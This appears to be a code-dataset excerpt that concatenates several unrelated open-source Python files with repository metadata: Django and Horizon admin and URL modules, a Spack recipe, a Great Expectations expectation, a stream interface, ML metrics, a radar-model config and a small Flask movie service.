] | null | null | null | apps/authentication/admin.py | Nicolaad/onlineweb4 | 5942eaf907d6824d5384147627def9edefdb9946 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.db.models import Count
from django.utils.translation import ugettext as _

from reversion.admin import VersionAdmin

from apps.authentication.models import (
    AllowedUsername,
    Email,
    GroupMember,
    GroupRole,
    OnlineGroup,
    OnlineUser,
    Position,
    SpecialPosition,
)
class EmailInline(admin.TabularInline):
    """Inline editor for a user's e-mail addresses."""
    model = Email
    # Always show one blank row for adding a new address.
    extra = 1
class OnlineUserAdmin(UserAdmin, VersionAdmin):
    """User admin combining Django's stock UserAdmin with reversion history."""
    model = OnlineUser
    inlines = (EmailInline,)
    list_display = [
        "username",
        "first_name",
        "last_name",
        "ntnu_username",
        "field_of_study",
        "is_member",
    ]
    list_filter = ("is_staff", "is_superuser", "is_active", "groups__name")
    # Edit form layout; section titles are translatable (Norwegian source).
    fieldsets = (
        (None, {"fields": ("username", "password")}),
        (
            _("Personlig info"),
            {"fields": ("first_name", "last_name", "phone_number", "online_mail")},
        ),
        (
            _("Studieinformasjon"),
            {"fields": ("ntnu_username", "field_of_study", "started_date", "compiled")},
        ),
        (_("Adresse"), {"fields": ("address", "zip_code")}),
        (_("Viktige datoer"), {"fields": ("last_login", "date_joined")}),
        (
            _("Annen info"),
            {
                "fields": (
                    "infomail",
                    "jobmail",
                    "mark_rules_accepted",
                    "rfid",
                    "nickname",
                    "website",
                )
            },
        ),
        (
            _("Tilganger"),
            {
                "fields": (
                    "is_active",
                    "is_staff",
                    "is_superuser",
                    "groups",
                    "user_permissions",
                )
            },
        ),
    )
    filter_horizontal = ("groups", "user_permissions")
    search_fields = ("first_name", "last_name", "username", "ntnu_username")
    readonly_fields = ("mark_rules_accepted",)
    def is_member(self, instance: OnlineUser):
        # Mirror the model's is_member attribute as a boolean icon column.
        return instance.is_member
    is_member.boolean = True
    def mark_rules_accepted(self, instance: OnlineUser):
        # Read-only mirror (listed in readonly_fields above) of the model's
        # mark_rules_accepted attribute, rendered as a boolean icon.
        return instance.mark_rules_accepted
    mark_rules_accepted.boolean = True
admin.site.register(OnlineUser, OnlineUserAdmin)
class AllowedUsernameAdmin(VersionAdmin):
    """Admin for the registry of whitelisted (member) NTNU usernames."""
    model = AllowedUsername
    list_display = ("username", "registered", "expiration_date", "note", "is_active")
    fieldsets = (
        (None, {"fields": ("username", "registered", "expiration_date")}),
        (_("Notater"), {"fields": ("note", "description")}),
    )
    search_fields = ("username",)
    def save_model(self, request, obj, form, change):
        """On creation, also opt the matching user (if any) into infomail.

        NOTE(review): saves via obj.save() instead of super().save_model();
        equivalent for the stock ModelAdmin but bypasses any overridden
        save_model() from mixins — confirm this is intentional.
        """
        if not change:
            # Try to fetch user with this username
            try:
                user = OnlineUser.objects.get(ntnu_username=obj.username)
            except OnlineUser.DoesNotExist:
                user = None
            # If username was found, set infomail to True
            if user and user.infomail is False:
                user.infomail = True
                user.save()
        obj.save()
    def is_active(self, instance):
        # Mirror the model's is_active attribute as a boolean icon column.
        return instance.is_active
    is_active.boolean = True
admin.site.register(AllowedUsername, AllowedUsernameAdmin)
class PositionAdmin(VersionAdmin):
    """Version-tracked admin for Position (no display customization)."""
    model = Position
admin.site.register(Position, PositionAdmin)
class SpecialPositionAdmin(VersionAdmin):
    """Version-tracked admin for SpecialPosition (no display customization)."""
    model = SpecialPosition
admin.site.register(SpecialPosition, SpecialPositionAdmin)
class GroupMemberInlineAdmin(admin.StackedInline):
    """Inline editor for a group's memberships (used by OnlineGroupAdmin)."""
    model = GroupMember
    # No blank extra rows by default.
    extra = 0
@admin.register(OnlineGroup)
class OnlineGroupAdmin(VersionAdmin):
    """Admin for internal groups, with membership counts in the list view."""
    model = OnlineGroup
    list_display = ("name_short", "name_long", "member_count", "verbose_type", "leader")
    list_display_links = ("name_short", "name_long")
    search_fields = ("name_short", "name_long", "group_type", "email")
    inlines = (GroupMemberInlineAdmin,)

    def get_queryset(self, request):
        """Annotate member counts so the computed column below is sortable."""
        # Count("members") creates the "members__count" annotation that
        # member_count.admin_order_field refers to; without it, clicking the
        # column header raises a FieldError (no such model field exists).
        return super().get_queryset(request).annotate(Count("members"))

    def member_count(self, group: OnlineGroup):
        """Own membership count, with the synced auth-group count in parentheses."""
        return f"{group.members.count()} ({group.group.user_set.count()})"

    member_count.admin_order_field = "members__count"
    # Fixed typo in the Norwegian column header: "medlemmder" -> "medlemmer".
    member_count.short_description = "Antall medlemmer (synkronisert)"
@admin.register(GroupMember)
class GroupMemberAdmin(VersionAdmin):
    """Admin for individual group memberships."""
    model = GroupMember
    list_display = ("user", "group", "all_roles")
    search_fields = (
        "user__username",
        "user__first_name",
        "user__last_name",
        "group__name_short",
        "group__name_long",
        "roles__role_type",
    )

    def all_roles(self, member: GroupMember):
        """Comma-separated names of every role the member holds."""
        role_names = (role.verbose_name for role in member.roles.all())
        return ", ".join(role_names)

    all_roles.short_description = "Roller"

    def get_queryset(self, *args):
        # Prefetch roles so all_roles() does not hit the DB once per row.
        queryset = super().get_queryset(*args)
        return queryset.prefetch_related("roles")
@admin.register(GroupRole)
class GroupRoleAdmin(VersionAdmin):
    """Admin for the catalogue of assignable group roles."""
    model = GroupRole
    list_display = ("role_type", "verbose_name")
    search_fields = ("role_type",)
| 27.360215 | 88 | 0.599528 |
795529cde049769e04b456e02a807a6f78f8c7fc | 519 | py | Python | var/spack/repos/builtin/packages/sparsehash/package.py | whitfin/spack | aabd2be31a511d0e00c1017f7311a421659319d9 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 3 | 2019-06-27T13:26:50.000Z | 2019-07-01T16:24:54.000Z | var/spack/repos/builtin/packages/sparsehash/package.py | openbiox/spack | bb6ec7fb40c14b37e094a860e3625af53f633174 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 75 | 2016-07-27T11:43:00.000Z | 2020-12-08T15:56:53.000Z | var/spack/repos/builtin/packages/sparsehash/package.py | openbiox/spack | bb6ec7fb40c14b37e094a860e3625af53f633174 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 8 | 2015-10-16T13:51:49.000Z | 2021-10-18T13:58:03.000Z | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Sparsehash(AutotoolsPackage):
    """Sparse and dense hash-tables for C++ by Google"""
    homepage = "https://github.com/sparsehash/sparsehash"
    url = "https://github.com/sparsehash/sparsehash/archive/sparsehash-2.0.3.tar.gz"
    # Second argument is the tarball checksum (32 hex chars: legacy MD5 form).
    version('2.0.3', 'd8d5e2538c1c25577b3f066d7a55e99e')
| 34.6 | 89 | 0.736031 |
795529f53576d940b3a836437e26d5f72856e6b7 | 138 | py | Python | flight_control/flight/admin.py | kenware/flight-api | adfa6f320b6c5bd9830bfb7c3c947028acf39e23 | [
"MIT"
] | null | null | null | flight_control/flight/admin.py | kenware/flight-api | adfa6f320b6c5bd9830bfb7c3c947028acf39e23 | [
"MIT"
] | 10 | 2019-08-06T02:06:53.000Z | 2022-02-10T11:16:37.000Z | flight_control/flight/admin.py | kenware/flight-api | adfa6f320b6c5bd9830bfb7c3c947028acf39e23 | [
"MIT"
] | null | null | null | from django.contrib import admin
from flight_control.flight.models import Flight
# Register your models here.
admin.site.register(Flight) | 27.6 | 47 | 0.833333 |
79552a7ff5a6c3baacd18824754627e8e783b69b | 7,711 | py | Python | great_expectations/expectations/core/expect_column_values_to_be_json_parseable.py | alecsaunders/great_expectations | 4227c970fd93cd66a9ad3b8ee5cd5e09763a4432 | [
"Apache-2.0"
] | 1 | 2022-01-26T18:51:29.000Z | 2022-01-26T18:51:29.000Z | great_expectations/expectations/core/expect_column_values_to_be_json_parseable.py | taylorfturner/great_expectations | e4964894fb97b933cac713ef1f1a78e33d362ff3 | [
"Apache-2.0"
] | null | null | null | great_expectations/expectations/core/expect_column_values_to_be_json_parseable.py | taylorfturner/great_expectations | e4964894fb97b933cac713ef1f1a78e33d362ff3 | [
"Apache-2.0"
] | null | null | null | from typing import Optional
from great_expectations.core.expectation_configuration import ExpectationConfiguration
from great_expectations.expectations.util import render_evaluation_parameter_string
from ...render.renderer.renderer import renderer
from ...render.types import RenderedStringTemplateContent
from ...render.util import (
num_to_str,
parse_row_condition_string_pandas_engine,
substitute_none_for_missing,
)
from ..expectation import ColumnMapExpectation
try:
import sqlalchemy as sa
except ImportError:
pass
class ExpectColumnValuesToBeJsonParseable(ColumnMapExpectation):
    """Expect column entries to be data written in JavaScript Object Notation.
    expect_column_values_to_be_json_parseable is a \
    :func:`column_map_expectation <great_expectations.execution_engine.execution_engine.MetaExecutionEngine
    .column_map_expectation>`.
    Args:
        column (str): \
            The column name.
    Keyword Args:
        mostly (None or a float between 0 and 1): \
            Return `"success": True` if at least mostly fraction of values match the expectation. \
            For more detail, see :ref:`mostly`.
    Other Parameters:
        result_format (str or None): \
            Which output mode to use: `BOOLEAN_ONLY`, `BASIC`, `COMPLETE`, or `SUMMARY`.
            For more detail, see :ref:`result_format <result_format>`.
        include_config (boolean): \
            If True, then include the expectation config as part of the result object. \
            For more detail, see :ref:`include_config`.
        catch_exceptions (boolean or None): \
            If True, then catch exceptions and include them as part of the result object. \
            For more detail, see :ref:`catch_exceptions`.
        meta (dict or None): \
            A JSON-serializable dictionary (nesting allowed) that will be included in the output without \
            modification. For more detail, see :ref:`meta`.
    Returns:
        An ExpectationSuiteValidationResult
        Exact fields vary depending on the values passed to :ref:`result_format <result_format>` and
        :ref:`include_config`, :ref:`catch_exceptions`, and :ref:`meta`.
    See Also:
        :func:`expect_column_values_to_match_json_schema \
        <great_expectations.execution_engine.execution_engine.ExecutionEngine
        .expect_column_values_to_match_json_schema>`
    """
    # This dictionary contains metadata for display in the public gallery
    library_metadata = {
        "maturity": "production",
        "package": "great_expectations",
        "tags": ["core expectation", "column map expectation"],
        "contributors": ["@great_expectations"],
        "requirements": [],
    }
    # Name of the map metric performing the per-value JSON-parse check.
    map_metric = "column_values.json_parseable"
    success_keys = ("mostly",)
    default_kwarg_values = {
        "row_condition": None,
        "condition_parser": None,  # we expect this to be explicitly set whenever a row_condition is passed
        "mostly": 1,
        "result_format": "BASIC",
        "include_config": True,
        "catch_exceptions": True,
    }
    args_keys = ("column",)
    def validate_configuration(self, configuration: Optional[ExpectationConfiguration]):
        """Validate configuration; adds no checks beyond the base class."""
        super().validate_configuration(configuration)
        return True
    @classmethod
    def _atomic_prescriptive_template(
        cls,
        configuration=None,
        result=None,
        language=None,
        runtime_configuration=None,
        **kwargs,
    ):
        """Build the (template string, schema-annotated params, styling) triple
        used by the atomic prescriptive renderer.
        """
        runtime_configuration = runtime_configuration or {}
        # Double defaulting: treat an explicit None the same as "not given".
        include_column_name = runtime_configuration.get("include_column_name", True)
        include_column_name = (
            include_column_name if include_column_name is not None else True
        )
        styling = runtime_configuration.get("styling")
        params = substitute_none_for_missing(
            configuration.kwargs,
            ["column", "mostly", "row_condition", "condition_parser"],
        )
        # Each param is wrapped with a JSON-schema type for the frontend;
        # "mostly_pct" starts as None and is filled in below when applicable.
        params_with_json_schema = {
            "column": {"schema": {"type": "string"}, "value": params.get("column")},
            "mostly": {"schema": {"type": "number"}, "value": params.get("mostly")},
            "mostly_pct": {
                "schema": {"type": "number"},
                "value": params.get("mostly_pct"),
            },
            "row_condition": {
                "schema": {"type": "string"},
                "value": params.get("row_condition"),
            },
            "condition_parser": {
                "schema": {"type": "string"},
                "value": params.get("condition_parser"),
            },
        }
        template_str = "values must be parseable as JSON"
        if params["mostly"] is not None:
            # Render mostly as a percentage without scientific notation.
            params_with_json_schema["mostly_pct"]["value"] = num_to_str(
                params["mostly"] * 100, precision=15, no_scientific=True
            )
            # params["mostly_pct"] = "{:.14f}".format(params["mostly"]*100).rstrip("0").rstrip(".")
            template_str += ", at least $mostly_pct % of the time."
        else:
            template_str += "."
        if include_column_name:
            template_str = "$column " + template_str
        if params["row_condition"] is not None:
            (
                conditional_template_str,
                conditional_params,
            ) = parse_row_condition_string_pandas_engine(
                params["row_condition"], with_schema=True
            )
            template_str = conditional_template_str + ", then " + template_str
            params_with_json_schema.update(conditional_params)
        return (template_str, params_with_json_schema, styling)
    @classmethod
    @renderer(renderer_type="renderer.prescriptive")
    @render_evaluation_parameter_string
    def _prescriptive_renderer(
        cls,
        configuration=None,
        result=None,
        language=None,
        runtime_configuration=None,
        **kwargs,
    ):
        """Render the expectation as a single string-template content block.

        NOTE(review): this largely duplicates _atomic_prescriptive_template
        (minus the JSON-schema wrapping); keep the two in sync.
        """
        runtime_configuration = runtime_configuration or {}
        include_column_name = runtime_configuration.get("include_column_name", True)
        include_column_name = (
            include_column_name if include_column_name is not None else True
        )
        styling = runtime_configuration.get("styling")
        params = substitute_none_for_missing(
            configuration.kwargs,
            ["column", "mostly", "row_condition", "condition_parser"],
        )
        template_str = "values must be parseable as JSON"
        if params["mostly"] is not None:
            params["mostly_pct"] = num_to_str(
                params["mostly"] * 100, precision=15, no_scientific=True
            )
            # params["mostly_pct"] = "{:.14f}".format(params["mostly"]*100).rstrip("0").rstrip(".")
            template_str += ", at least $mostly_pct % of the time."
        else:
            template_str += "."
        if include_column_name:
            template_str = "$column " + template_str
        if params["row_condition"] is not None:
            (
                conditional_template_str,
                conditional_params,
            ) = parse_row_condition_string_pandas_engine(params["row_condition"])
            template_str = conditional_template_str + ", then " + template_str
            params.update(conditional_params)
        return [
            RenderedStringTemplateContent(
                **{
                    "content_block_type": "string_template",
                    "string_template": {
                        "template": template_str,
                        "params": params,
                        "styling": styling,
                    },
                }
            )
        ]
| 37.251208 | 107 | 0.613669 |
79552bb093a507df525f6837f2c199b56e54edb3 | 8,571 | py | Python | streams/interfaces/iterable_stream_interface.py | kefir/snakee | a17734d4b2d7dfd3e6c7b195baa128fbc84d197b | [
"MIT"
] | null | null | null | streams/interfaces/iterable_stream_interface.py | kefir/snakee | a17734d4b2d7dfd3e6c7b195baa128fbc84d197b | [
"MIT"
] | null | null | null | streams/interfaces/iterable_stream_interface.py | kefir/snakee | a17734d4b2d7dfd3e6c7b195baa128fbc84d197b | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from typing import Optional, Union, Callable, Iterable, Iterator, NoReturn
try: # Assume we're a sub-module in a package.
from utils import arguments as arg
from utils.external import DataFrame
from utils.algo import JoinType
from streams.stream_type import StreamType
from streams.interfaces.abstract_stream_interface import StreamInterface
from base.interfaces.context_interface import ContextInterface
from loggers.selection_logger_interface import SelectionLoggerInterface
except ImportError: # Apparently no higher-level package has been imported, fall back to a local import.
from ...utils import arguments as arg
from ...utils.external import DataFrame
from ...utils.algo import JoinType
from ..stream_type import StreamType
from ..interfaces.abstract_stream_interface import StreamInterface
from ...base.interfaces.context_interface import ContextInterface
from ...loggers.selection_logger_interface import SelectionLoggerInterface
# Type aliases used in the interface below.
Native = StreamInterface  # "stream of the same concrete class" return type
Stream = StreamInterface  # any stream implementation
Context = Union[ContextInterface, arg.Auto, None]
Count = Union[int, arg.Auto]
OptionalFields = Union[Iterable, str, None]
class IterableStreamInterface(StreamInterface, ABC):
    """Interface for streams whose data is an iterable sequence of items."""
    @abstractmethod
    def __iter__(self) -> Iterable:
        """Returns link to Iterable data in stream.
        :return: list or Iterator
        """
        pass
    @abstractmethod
    def is_in_memory(self) -> bool:
        """Checks is the data of stream in RAM or in external iterator.
        :return: True if stream has data as Sequence in memory, False if it has an iterator
        """
        pass
    @abstractmethod
    def close(self, recursively: bool = False, return_closed_links: bool = False) -> Union[int, tuple]:
        """Closes stream and its sources by known links (i.e. file or database connection).
        :param recursively: close all links to stream recursively
        :type recursively: bool
        :param return_closed_links: let return count of closed streams and links, otherwise stream count only
        :type return_closed_links: bool
        :return: count of closed streams or tuple with count of closed streams and links
        """
        pass
    @abstractmethod
    def forget(self) -> NoReturn:
        """Closes stream and remove links to it from SnakeeContext and connectors."""
        pass
    @abstractmethod
    def get_iter(self) -> Iterator:
        """Presents items from stream as Iterator.
        :return: Iterator or Generator
        """
        pass
    @abstractmethod
    def get_count(self) -> Optional[int]:
        """Returns count of items in stream is it's known, otherwise returns None.
        :return: int or None
        """
        pass
    @abstractmethod
    def get_expected_count(self) -> Optional[int]:
        """Returns expected count of items if it's provided in from stream meta-information.
        :return: int or None (if count expectation is not available for this stream or data source)
        """
        pass
    @abstractmethod
    def get_estimated_count(self) -> Optional[int]:
        """Returns estimated count (upper bound) of items from stream meta-information.
        :return: int or None (if count estimation is not available for this stream or data source)
        """
        pass
    @abstractmethod
    def get_str_count(self) -> str:
        """Returns string with general information about expected and estimated count of items in stream."""
        pass
    @abstractmethod
    def enumerate(self, native: bool = False) -> Stream:
        """Returns stream with enumerated items of current stream.
        :param native: let return stream of same class (KeyValueStream will returned by default)
        :type native: bool
        :return: KeyValueStream (if native=False) or stream of same class (if native=True)
        """
        pass
    @abstractmethod
    def get_one_item(self):
        """Returns first item from stream for example."""
        pass
    @abstractmethod
    def take(self, count: int = 1) -> Native:
        """Return stream containing first N items.
        Alias for head()
        :param count: count of items to return
        :type count: int
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def head(self, count: int = 10) -> Native:
        """Return stream containing first N items.
        Alias for take()
        :param count: count of items to return
        :type count: int
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def tail(self, count: int = 10) -> Native:
        """Return stream containing last N items from current stream.
        :param count: count of items to return
        :type count: int
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def skip(self, count: int) -> Native:
        """Return stream with items except first N items.
        :param count: count of items to skip
        :type count: int
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def pass_items(self) -> Native:
        """Receive and skip all items from data source.
        Can be used for case when data source must be sure that all data has been transmitted successfully.
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def stream(self, data: Iterable, ex: OptionalFields = None, **kwargs) -> Native:
        """Build new stream with data provided.
        Meta-information of initial stream will by saved by default (excluding fields from ex-argument).
        :param data: link to iterable data for new stream
        :type data: Iterable
        :param ex: one field name or list of fields to exclude from transmitted meta-information
        :type ex: list or str or None
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def add(self, stream_or_items: Union[Native, Iterable], before=False, **kwargs) -> Native:
        """Returns stream with another stream or provided items concatenated to current data.
        :param stream_or_items: stream or iterable of items to concatenate
        :param before: add provided data before current data instead of after
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def add_stream(self, stream: Native, before: bool = False) -> Native:
        """Returns stream with items of the provided stream concatenated to current data.
        :param before: add provided data before current data instead of after
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def add_items(self, items: Iterable, before: bool = False) -> Native:
        """Returns stream with the provided items concatenated to current data.
        :param before: add provided items before current data instead of after
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def split(self, by: Union[int, list, tuple, Callable], count: Optional[int] = None) -> Iterable:
        """Splits stream into several streams.
        :param by: split position(s) or selector function -- exact semantics defined by implementations
        :return: Iterable of streams
        """
        pass
    @abstractmethod
    def split_to_iter_by_step(self, step: int) -> Iterable:
        """Splits stream into consecutive parts of up to step items each.
        :return: Iterable of streams
        """
        pass
    @abstractmethod
    def flat_map(self, function: Callable) -> Native:
        """Applies function to each item and flattens the resulting iterables into one stream.
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def map_side_join(
            self,
            right: Native,
            key,
            how: Union[JoinType, str] = JoinType.Left,
            right_is_uniq: bool = True,
    ) -> Native:
        """Joins current stream with another (right) stream by key.
        :param how: join type (left join by default)
        :param right_is_uniq: declare that keys in right stream are unique -- TODO confirm effect in implementations
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def apply_to_data(
            self, function: Callable,
            to: StreamType = arg.AUTO,
            save_count: bool = False, lazy: bool = True,
    ) -> Stream:
        """Applies function to the whole data of the stream.
        :param to: type of resulting stream (auto-detected by default)
        :return: Stream of the requested type
        """
        pass
    @abstractmethod
    def progress(
            self,
            expected_count: Count = arg.AUTO, step: Count = arg.AUTO,
            message: str = 'Progress',
    ) -> Native:
        """Shows customizable progress-bar on output, writes logs of progress into file, if file added to logger.
        :param expected_count: allows to provide expected count of items in stream, when it's known
        :param step: how often show update (lower values can make process more slow), 10000 by default
        :param message: custom message to show in progress-bar
        :return: same stream
        """
        pass
    @abstractmethod
    def print(self, stream_function: Union[str, Callable] = '_count', *args, **kwargs) -> Native:
        """Prints the result of stream_function applied to the stream; returns the stream for chaining.
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def submit(
            self,
            external_object: Union[list, dict, Callable] = print,
            stream_function: Union[Callable, str] = 'get_count',
            key: Optional[str] = None,
            show: bool = False,
    ) -> Stream:
        """Sends the result of stream_function into external_object (callable, list or dict).
        :param key: key to use when external_object is a dict -- TODO confirm
        :param show: whether to also display the submitted value -- TODO confirm
        :return: Stream (for chaining)
        """
        pass
    @abstractmethod
    def set_meta(self, **meta) -> Native:
        """Returns stream with its meta-information set from the provided fields.
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def update_meta(self, **meta) -> Native:
        """Returns stream with the provided fields merged into its meta-information.
        :return: Native Stream (stream of same class)
        """
        pass
    @abstractmethod
    def get_selection_logger(self) -> SelectionLoggerInterface:
        """Returns the logger used for selection operations.
        :return: SelectionLoggerInterface implementation
        """
        pass
    @abstractmethod
    def get_dataframe(self, columns: Optional[Iterable] = None) -> DataFrame:
        """Returns stream data as a DataFrame, optionally restricted to the given columns.
        :return: DataFrame built from stream items
        """
        pass
| 31.862454 | 113 | 0.643332 |
79552bfcc2c78b69474b39be06cf2f7dca51c8fa | 1,109 | py | Python | gcforest/utils/metrics.py | chenkangyang/CMAESEforWaterPrediction | a50a53748e5cbfc1ae856e776cfa15f80b871780 | [
"MIT"
] | null | null | null | gcforest/utils/metrics.py | chenkangyang/CMAESEforWaterPrediction | a50a53748e5cbfc1ae856e776cfa15f80b871780 | [
"MIT"
] | 12 | 2019-12-16T21:48:20.000Z | 2022-02-10T00:21:16.000Z | gcforest/utils/metrics.py | chenkangyang/CMAESEforWaterPrediction | a50a53748e5cbfc1ae856e776cfa15f80b871780 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import numpy as np
from sklearn.metrics import f1_score
from .win_utils import win_vote, win_avg
def accuracy(y_true, y_pred):
    """Fraction of positions where y_true equals y_pred.

    Inputs are coerced to numpy arrays so plain Python lists are compared
    element-wise; previously a bare ``list == list`` evaluated to a single
    bool, silently yielding 0.0 or 1.0 for list inputs.
    """
    y_true = np.asarray(y_true)
    y_pred = np.asarray(y_pred)
    return 1.0 * np.sum(y_true == y_pred) / len(y_true)
def accuracy_pb(y_true, y_proba):
    """Accuracy where predictions are the argmax over per-class probabilities."""
    labels = y_true.reshape(-1)
    flat_proba = y_proba.reshape((-1, y_proba.shape[-1]))
    predictions = np.argmax(flat_proba, 1)
    return 1.0 * np.sum(labels == predictions) / len(labels)
def f1_pb(y_true, y_proba):
    """Weighted F1 score computed from argmax predictions over class probabilities."""
    flat_true = y_true.reshape(-1)
    flat_pred = y_proba.reshape((-1, y_proba.shape[-1])).argmax(1)
    return f1_score(flat_true, flat_pred, average="weighted")
def accuracy_win_vote(y_true, y_proba):
    """
    Accuracy after majority voting over each sample's windows.

    Parameters
    ----------
    y_true: n x n_windows
    y_proba: n x n_windows x n_classes

    Notes
    -----
    Uses y_true[:, 0] as the per-sample label — assumes every window of a
    sample carries the same label (TODO confirm upstream).
    """
    n_classes = y_proba.shape[-1]
    y_pred = win_vote(np.argmax(y_proba, axis=2), n_classes)
    return accuracy(y_true[:,0], y_pred)
def accuracy_win_avg(y_true, y_proba):
    """Accuracy after combining per-window probabilities with win_avg().

    Parameters
    ----------
    y_true: n x n_windows
    y_proba: n x n_windows x n_classes
    """
    combined_pred = win_avg(y_proba)
    return accuracy(y_true[:, 0], combined_pred)
| 24.644444 | 67 | 0.641118 |
79552c9460acce1a8fabe24a555e1baf2d55ddbf | 1,854 | py | Python | openstack_dashboard/test/urls.py | enovance/horizon | 2ed6e93c9c4e534883126c93d3283e8c93bc674f | [
"Apache-2.0"
] | 3 | 2015-04-24T22:39:12.000Z | 2021-03-29T15:38:53.000Z | openstack_dashboard/test/urls.py | enovance/horizon | 2ed6e93c9c4e534883126c93d3283e8c93bc674f | [
"Apache-2.0"
] | 1 | 2021-03-21T11:48:09.000Z | 2021-03-21T11:48:09.000Z | openstack_dashboard/test/urls.py | enovance/horizon | 2ed6e93c9c4e534883126c93d3283e8c93bc674f | [
"Apache-2.0"
] | 15 | 2017-01-12T10:40:00.000Z | 2019-04-19T08:28:05.000Z | #
# (c) Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
URL patterns for the OpenStack Dashboard.
"""
from django.conf import settings
from django.conf.urls import include
from django.conf.urls import patterns
from django.conf.urls.static import static # noqa
from django.conf.urls import url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns # noqa
from openstack_dashboard.test.jasmine import jasmine
import horizon
# Root URLconf for the test/development dashboard.
urlpatterns = patterns(
    '',
    # Splash page at the site root.
    url(r'^$', 'openstack_dashboard.views.splash', name='splash'),
    url(r'^auth/', include('openstack_auth.urls')),
    url(r'^api/', include('openstack_dashboard.api.rest.urls')),
    # Jasmine JavaScript test runner (test-only endpoint).
    url(r'^jasmine/(.*?)$', jasmine.dispatcher),
    # Everything else is delegated to Horizon's own URLconf.
    url(r'', include(horizon.urls)),
)

# Development static app and project media serving using the staticfiles app.
urlpatterns += staticfiles_urlpatterns()

# Convenience for serving user-uploaded media during
# development. Only active if DEBUG==True and the URL prefix is a local
# path. Production media should NOT be served by Django.
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)

if settings.DEBUG:
    urlpatterns += patterns(
        '',
        # Expose the 500 handler directly so it can be previewed in DEBUG.
        url(r'^500/$', 'django.views.defaults.server_error')
    )
| 34.981132 | 78 | 0.73247 |
79552d6b7be55db40f99839650fc6e0d26f4a57c | 1,189 | py | Python | configs/past/config_rodnet_gsc_win16.py | zhengzangw/RODNet | eca5f2bd1f3051c2b823d279532ddafa71b009c1 | [
"MIT"
] | null | null | null | configs/past/config_rodnet_gsc_win16.py | zhengzangw/RODNet | eca5f2bd1f3051c2b823d279532ddafa71b009c1 | [
"MIT"
] | null | null | null | configs/past/config_rodnet_gsc_win16.py | zhengzangw/RODNet | eca5f2bd1f3051c2b823d279532ddafa71b009c1 | [
"MIT"
] | null | null | null | dataset_cfg = dict(
dataset_name="rod2021_valid",
base_root="./rod2021_valid",
data_root="./rod2021_valid/sequences",
anno_root="./rod2021_valid/annotations",
anno_ext=".txt",
train=dict(subdir="train",),
valid=dict(subdir="valid", seqs=[],),
test=dict(subdir="test",),
demo=dict(subdir="demo", seqs=[],),
)
model_cfg = dict(
type="GSC",
name="rodnet-gsc-win16",
max_dets=20,
peak_thres=0.4,
ols_thres=0.3,
stacked_num=1,
)
confmap_cfg = dict(
confmap_sigmas={"pedestrian": 15, "cyclist": 20, "car": 30,},
confmap_sigmas_interval={
"pedestrian": [5, 15],
"cyclist": [8, 20],
"car": [10, 30],
},
confmap_length={"pedestrian": 1, "cyclist": 2, "car": 3,},
)
train_cfg = dict(
n_epoch=30,
batch_size=32,
lr=0.0001,
lr_step=10, # lr will decrease 10 times after lr_step epoches
win_size=16,
train_step=1,
train_stride=4,
log_step=100,
save_step=10000,
)
test_cfg = dict(
test_step=1,
test_stride=8,
rr_min=1.0, # min radar range
rr_max=20.0, # max radar range
ra_min=-60.0, # min radar angle
ra_max=60.0, # max radar angle
)
| 23.313725 | 66 | 0.60471 |
79553033b9ba384440e98146a2a03a59854c8f95 | 924 | py | Python | src/users/app.py | MitraThakker/MyMDB | f812f9005b64f0644ff0829211e098a115bf1584 | [
"MIT"
] | null | null | null | src/users/app.py | MitraThakker/MyMDB | f812f9005b64f0644ff0829211e098a115bf1584 | [
"MIT"
] | null | null | null | src/users/app.py | MitraThakker/MyMDB | f812f9005b64f0644ff0829211e098a115bf1584 | [
"MIT"
] | null | null | null | from flask import Flask, jsonify, request
from src.users import svc as user_svc
# WSGI application object for the user-facing movie service.
app = Flask('user')
@app.route('/', methods=['GET'])
def index():
    """Root endpoint: respond with a static greeting."""
    greeting = "Hello, world!"
    return greeting
@app.route('/movies', methods=['GET'])
def list_all_movies():
    """Return the full movie catalogue as JSON; 500 if the lookup fails."""
    movies = user_svc.list_all_movies()
    if movies is None:
        return "error", 500
    return jsonify(movies), 200
@app.route('/movie/<int:movie_id>', methods=['GET'])
def movie_details(movie_id: int):
    """Return details for one movie as JSON; 500 if the lookup fails."""
    details = user_svc.movie_details(movie_id)
    if details is None:
        return "error", 500
    return jsonify(details), 200
@app.route('/movie/search', methods=['GET'])
def search_movie():
    """Search movies by the 'query' request argument (default: empty)."""
    query = request.args.get('query', '')
    matches = user_svc.search_movie(query)
    if matches is None:
        return "error", 500
    return jsonify(matches), 200
if __name__ == '__main__':
    # Development entry point: Flask debug server, reachable on all
    # interfaces (0.0.0.0) at port 5002. Not suitable for production.
    app.run(debug=True, host='0.0.0.0', port=5002)
